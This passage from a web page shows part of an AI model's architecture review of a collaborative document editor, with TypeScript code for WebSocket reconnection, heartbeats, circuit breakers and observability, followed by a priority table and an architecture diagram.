      console.error('Max reconnection attempts reached');
      this.onMaxRetriesExceeded?.();
      return;
    }

    const delay = Math.min(
      this.baseDelay * Math.pow(2, this.reconnectAttempts) + Math.random() * 1000,
      this.maxDelay
    );

    console.log(`Reconnecting in ${delay}ms (attempt ${this.reconnectAttempts + 1})`);
    
    setTimeout(() => {
      this.reconnectAttempts++;
      this.connect();
    }, delay);
  }

  send(message: string): void {
    if (this.ws?.readyState === WebSocket.OPEN) {
      this.ws.send(message);
    } else {
      // Queue message for when connection is restored
      this.messageQueue.push(message);
    }
  }

  private flushMessageQueue(): void {
    while (this.messageQueue.length > 0 && this.ws?.readyState === WebSocket.OPEN) {
      const message = this.messageQueue.shift()!;
      this.ws.send(message);
    }
  }

  // Callbacks
  onMessage?: (data: any) => void;
  onMaxRetriesExceeded?: () => void;

  private handleMessage(data: any): void {
    this.onMessage?.(data);
  }
}

Server-Side: Event Resumption

class WebSocketServer {
  private redis: Redis;

  async handleConnection(ws: WebSocket, req: Request): Promise<void> {
    const documentId = req.query.documentId as string;
    const lastEventId = req.query.lastEventId as string | undefined;

    // Send missed events if client is resuming
    if (lastEventId) {
      const missedEvents = await this.getMissedEvents(documentId, lastEventId);
      for (const event of missedEvents) {
        ws.send(JSON.stringify(event));
      }
    }

    // Subscribe to new events
    this.subscribeToDocument(documentId, ws);
  }

  private async getMissedEvents(documentId: string, lastEventId: string): Promise<any[]> {
    // Use Redis Streams for event sourcing
    const events = await this.redis.xrange(
      `doc:${documentId}:events`,
      lastEventId,
      '+',
      'COUNT', 1000
    );

    return events
      .filter(([id]) => id !== lastEventId)  // Exclude the last seen event
      .map(([id, fields]) => ({
        eventId: id,
        ...this.parseStreamFields(fields)
      }));
  }
}

Issue 7.2: No Heartbeat/Keep-Alive

The Problem: Silent connection failures (NAT timeout, proxy disconnect) aren't detected, leaving "zombie" connections.

Solution: Bidirectional Heartbeat

// Client-side
class HeartbeatWebSocket extends ResilientWebSocket {
  private heartbeatInterval: NodeJS.Timeout | null = null;
  private heartbeatTimeout: NodeJS.Timeout | null = null;
  private readonly HEARTBEAT_INTERVAL = 30000;  // 30 seconds
  private readonly HEARTBEAT_TIMEOUT = 10000;   // 10 seconds to respond

  protected onOpen(): void {
    super.onOpen();
    this.startHeartbeat();
  }

  protected onClose(): void {
    this.stopHeartbeat();
    super.onClose();
  }

  private startHeartbeat(): void {
    this.heartbeatInterval = setInterval(() => {
      if (this.ws?.readyState === WebSocket.OPEN) {
        this.ws.send(JSON.stringify({ type: 'ping', timestamp: Date.now() }));
        
        this.heartbeatTimeout = setTimeout(() => {
          console.log('Heartbeat timeout - closing connection');
          this.ws?.close();
        }, this.HEARTBEAT_TIMEOUT);
      }
    }, this.HEARTBEAT_INTERVAL);
  }

  private stopHeartbeat(): void {
    if (this.heartbeatInterval) clearInterval(this.heartbeatInterval);
    if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
  }

  protected handleMessage(data: any): void {
    if (data.type === 'pong') {
      if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
      return;
    }
    super.handleMessage(data);
  }
}

// Server-side
class WebSocketServerWithHeartbeat {
  private readonly CLIENT_TIMEOUT = 60000;  // 60 seconds without activity

  handleConnection(ws: WebSocket): void {
    let lastActivity = Date.now();

    const checkTimeout = setInterval(() => {
      if (Date.now() - lastActivity > this.CLIENT_TIMEOUT) {
        console.log('Client timeout - closing connection');
        ws.close(4000, 'Timeout');
        clearInterval(checkTimeout);
      }
    }, 10000);

    ws.on('message', (message) => {
      lastActivity = Date.now();
      
      const data = JSON.parse(message.toString());
      if (data.type === 'ping') {
        ws.send(JSON.stringify({ type: 'pong', timestamp: Date.now() }));
        return;
      }
      
      this.handleMessage(ws, data);
    });

    ws.on('close', () => {
      clearInterval(checkTimeout);
    });
  }
}

8. Failure Recovery

Issue 8.1: No Graceful Degradation

The Problem: When components fail, the entire system becomes unusable instead of degrading gracefully.

Solution: Circuit Breakers and Fallbacks

import CircuitBreaker from 'opossum';

class ResilientDocumentService {
  private dbBreaker: CircuitBreaker;
  private redisBreaker: CircuitBreaker;
  private localCache: LRUCache<string, Document>;

  constructor() {
    // Database circuit breaker
    this.dbBreaker = new CircuitBreaker(this.queryDatabase.bind(this), {
      timeout: 3000,           // 3 second timeout
      errorThresholdPercentage: 50,  // Open after 50% failures
      resetTimeout: 30000,     // Try again after 30 seconds
      volumeThreshold: 10      // Minimum requests before opening
    });

    this.dbBreaker.fallback(async (documentId: string) => {
      // Try Redis cache
      return this.getFromRedis(documentId);
    });

    this.dbBreaker.on('open', () => {
      console.error('Database circuit breaker opened');
      this.alertOps('Database circuit breaker opened');
    });

    // Redis circuit breaker
    this.redisBreaker = new CircuitBreaker(this.queryRedis.bind(this), {
      timeout: 1000,
      errorThresholdPercentage: 50,
      resetTimeout: 10000
    });

    this.redisBreaker.fallback(async (key: string) => {
      // Fall back to local cache
      return this.localCache.get(key);
    });
  }

  async getDocument(documentId: string): Promise<Document | null> {
    try {
      // Try local cache first
      const cached = this.localCache.get(documentId);
      if (cached) return cached;

      // Try Redis (through circuit breaker)
      const redisDoc = await this.redisBreaker.fire(documentId);
      if (redisDoc) {
        this.localCache.set(documentId, redisDoc);
        return redisDoc;
      }

      // Try database (through circuit breaker)
      const dbDoc = await this.dbBreaker.fire(documentId);
      if (dbDoc) {
        this.localCache.set(documentId, dbDoc);
        await this.cacheInRedis(documentId, dbDoc);
        return dbDoc;
      }

      return null;
    } catch (error) {
      console.error('All fallbacks failed:', error);
      throw new ServiceUnavailableError('Document service temporarily unavailable');
    }
  }

  // Degraded mode: Allow viewing but not editing
  async saveOperation(op: DocumentOperation): Promise<SaveResult> {
    try {
      await this.dbBreaker.fire(op);
      return { success: true };
    } catch (error) {
      if (this.dbBreaker.opened) {
        // Queue operation for later processing
        await this.queueForRetry(op);
        return { 
          success: false, 
          queued: true,
          message: 'Your changes are saved locally and will sync when service is restored'
        };
      }
      throw error;
    }
  }
}

9. Observability Gaps

Issue 9.1: Missing Metrics and Tracing

The Problem: Without proper observability, you can't diagnose issues or understand system behavior.

Solution: Comprehensive Observability Stack

import { metrics, trace, context } from '@opentelemetry/api';
import { PrometheusExporter } from '@opentelemetry/exporter-prometheus';

class DocumentMetrics {
  private meter = metrics.getMeter('document-service');
  private tracer = trace.getTracer('document-service');

  // Counters
  private operationsTotal = this.meter.createCounter('document_operations_total', {
    description: 'Total number of document operations'
  });

  private conflictsTotal = this.meter.createCounter('document_conflicts_total', {
    description: 'Total number of operation conflicts'
  });

  // Histograms
  private operationLatency = this.meter.createHistogram('document_operation_latency_ms', {
    description: 'Latency of document operations in milliseconds'
  });

  private syncLatency = this.meter.createHistogram('document_sync_latency_ms', {
    description: 'Time from operation submission to all clients receiving it'
  });

  // Gauges
  private activeConnections = this.meter.createObservableGauge('websocket_connections_active', {
    description: 'Number of active WebSocket connections'
  });

  private documentSize = this.meter.createHistogram('document_size_bytes', {
    description: 'Size of documents in bytes'
  });

  // Instrument an operation
  async trackOperation<T>(
    operationType: string,
    documentId: string,
    fn: () => Promise<T>
  ): Promise<T> {
    const span = this.tracer.startSpan(`document.${operationType}`, {
      attributes: {
        'document.id': documentId,
        'operation.type': operationType
      }
    });

    const startTime = Date.now();

    try {
      const result = await context.with(trace.setSpan(context.active(), span), fn);
      
      this.operationsTotal.add(1, {
        operation: operationType,
        status: 'success'
      });

      return result;
    } catch (error) {
      span.recordException(error as Error);
      
      this.operationsTotal.add(1, {
        operation: operationType,
        status: 'error',
        error_type: (error as Error).name
      });

      throw error;
    } finally {
      const duration = Date.now() - startTime;
      this.operationLatency.record(duration, {
        operation: operationType
      });
      span.end();
    }
  }

  recordConflict(documentId: string, conflictType: string): void {
    this.conflictsTotal.add(1, {
      document_id: documentId,
      conflict_type: conflictType
    });
  }

  recordSyncLatency(latencyMs: number): void {
    this.syncLatency.record(latencyMs);
  }
}

// Structured logging
import pino from 'pino';

const logger = pino({
  level: process.env.LOG_LEVEL || 'info',
  formatters: {
    level: (label) => ({ level: label })
  },
  base: {
    service: 'document-service',
    version: process.env.APP_VERSION
  }
});

// Usage
class DocumentService {
  private metrics = new DocumentMetrics();
  private logger = logger.child({ component: 'DocumentService' });

  async applyOperation(op: DocumentOperation): Promise<void> {
    return this.metrics.trackOperation('apply', op.documentId, async () => {
      this.logger.info({
        event: 'operation_received',
        documentId: op.documentId,
        userId: op.userId,
        revision: op.revision
      });

      // ... apply operation

      this.logger.info({
        event: 'operation_applied',
        documentId: op.documentId,
        newRevision: op.revision
      });
    });
  }
}

10. Summary: Priority Matrix

Issue	Severity	Effort	Priority
Client clock timestamps	🔴 Critical	Medium	P0
Paragraph-level LWW	🔴 Critical	High	P0
Cross-server WebSocket isolation	🔴 Critical	Medium	P0
30-second snapshot data loss	🔴 Critical	Medium	P0
JWT in localStorage	🟠 High	Low	P1
CDN caching API responses	🟠 High	Low	P1
Missing document authorization	🟠 High	Medium	P1
PostgreSQL as message bus	🟠 High	High	P1
No WebSocket reconnection	🟡 Medium	Low	P2
No heartbeat/keep-alive	🟡 Medium	Low	P2
Read replica lag	🟡 Medium	Medium	P2
Organization-based sharding	🟡 Medium	High	P2
HTML storage (XSS)	🟡 Medium	Medium	P2
Missing observability	🟡 Medium	Medium	P2
No circuit breakers	🟢 Low	Medium	P3

Recommended Architecture

┌─────────────────────────────────────────────────────────────────────────────┐
│                              Load Balancer                                   │
│                    (Sticky sessions by document ID)                          │
└─────────────────────────────────────────────────────────────────────────────┘
                                      │
                    ┌─────────────────┼─────────────────┐
                    ▼                 ▼                 ▼
            ┌──────────────┐  ┌──────────────┐  ┌──────────────┐
            │  API Server  │  │  API Server  │  │  API Server  │
            │  + WebSocket │  │  + WebSocket │  │  + WebSocket │
            │  + OT Engine │  │  + OT Engine │  │  + OT Engine │
            └──────────────┘  └──────────────┘  └──────────────┘
                    │                 │                 │
                    └─────────────────┼─────────────────┘
                                      │
                    ┌─────────────────┼─────────────────┐
                    ▼                 ▼                 ▼
            ┌──────────────┐  ┌──────────────┐  ┌──────────────┐
            │    Redis     │  │    Redis     │  │    Redis     │
            │  (Primary)   │  │  (Replica)   │  │  (Replica)   │
            │  - Pub/Sub   │  │              │  │              │
            │  - Op Cache  │  │              │  │              │
            │  - Sessions  │  │              │  │              │
            └──────────────┘  └──────────────┘  └──────────────┘
                                      │
                    ┌─────────────────┼─────────────────┐
                    ▼                 ▼                 ▼
            ┌──────────────┐  ┌──────────────┐  ┌──────────────┐
            │  PostgreSQL  │  │  PostgreSQL  │  │  PostgreSQL  │
            │  (Primary)   │  │  (Replica)   │  │  (Replica)   │
            │  - Documents │  │  (Read-only) │  │  (Read-only) │
            │  - Operations│  │              │  │              │
            │  - Snapshots │  │              │  │              │
            └──────────────┘  └──────────────┘  └──────────────┘

This architecture addresses all critical issues while maintaining scalability and reliability.

Debug This Architecture

Turn this model response into notes, narration, or a short video

Auto Notes Transcript Narrate Video Cut

Partner link

This output is part of our open dataset — 5K+ AI responses across 200 models

About Claude Opus 4.5

Capabilities

ConversationReasoningCode GenerationAnalysisTool Use

Specifications

Provider: Anthropic
Released: 2025-11-24
Size: XLARGE

Keep exploring

SAME PROMPT

Claude Sonnet 4.6's version

Same prompt, different result

COMPARE

Claude Opus 4.5 vs Gemini 3.1 Pro Preview

Both outputs, side by side

Debug This Architecture

?Prompt

Response

Comprehensive Architecture Review: Real-time Collaborative Document Editor

1. Critical Data Consistency Issues

Issue 1.1: Client Clock-Based Timestamps (Last-Write-Wins)

Issue 1.2: Paragraph-Level Last-Write-Wins Destroys Work

2. Real-time Synchronization Failures

Issue 2.1: Cross-Server WebSocket Isolation

Issue 2.2: 2-Second Polling Creates Unacceptable Latency

3. Data Storage and Durability Issues

Issue 3.1: 30-Second Snapshot Interval Causes Data Loss

Issue 3.2: Full HTML Snapshots Are Inefficient and Dangerous

4. Security Vulnerabilities

Issue 4.1: JWT in localStorage is Vulnerable to XSS

Issue 4.2: 24-Hour Token Expiry is Too Long

Issue 4.3: Missing Document-Level Authorization

5. Caching Catastrophes

Issue 5.1: CDN Caching API Responses for 5 Minutes

6. Scaling Bottlenecks

Issue 6.1: PostgreSQL as Real-Time Message Bus

Issue 6.2: Organization-Based Partitioning Causes Hot Spots

Issue 6.3: Read Replicas with Replication Lag

7. WebSocket Connection Management

Issue 7.1: No Reconnection Strategy

Issue 7.2: No Heartbeat/Keep-Alive

8. Failure Recovery

Issue 8.1: No Graceful Degradation

9. Observability Gaps

Issue 9.1: Missing Metrics and Tracing

10. Summary: Priority Matrix

Recommended Architecture

About Claude Opus 4.5

Capabilities

Categories

Specifications

Claude Sonnet 4.6's version

Claude Opus 4.5 vs Gemini 3.1 Pro Preview

Debug This Architecture

?Prompt

Response

Comprehensive Architecture Review: Real-time Collaborative Document Editor

1. Critical Data Consistency Issues

Issue 1.1: Client Clock-Based Timestamps (Last-Write-Wins)

Issue 1.2: Paragraph-Level Last-Write-Wins Destroys Work

2. Real-time Synchronization Failures

Issue 2.1: Cross-Server WebSocket Isolation

Issue 2.2: 2-Second Polling Creates Unacceptable Latency

3. Data Storage and Durability Issues

Issue 3.1: 30-Second Snapshot Interval Causes Data Loss

Issue 3.2: Full HTML Snapshots Are Inefficient and Dangerous

4. Security Vulnerabilities

Issue 4.1: JWT in localStorage is Vulnerable to XSS

Issue 4.2: 24-Hour Token Expiry is Too Long

Issue 4.3: Missing Document-Level Authorization

5. Caching Catastrophes

Issue 5.1: CDN Caching API Responses for 5 Minutes

6. Scaling Bottlenecks

Issue 6.1: PostgreSQL as Real-Time Message Bus

Issue 6.2: Organization-Based Partitioning Causes Hot Spots

Issue 6.3: Read Replicas with Replication Lag

7. WebSocket Connection Management

Issue 7.1: No Reconnection Strategy

Issue 7.2: No Heartbeat/Keep-Alive

8. Failure Recovery

Issue 8.1: No Graceful Degradation

9. Observability Gaps

Issue 9.1: Missing Metrics and Tracing

10. Summary: Priority Matrix

Recommended Architecture

About Claude Opus 4.5

Capabilities

Categories

Specifications

Claude Sonnet 4.6's version

Claude Opus 4.5 vs Gemini 3.1 Pro Preview

?
Prompt

?
Prompt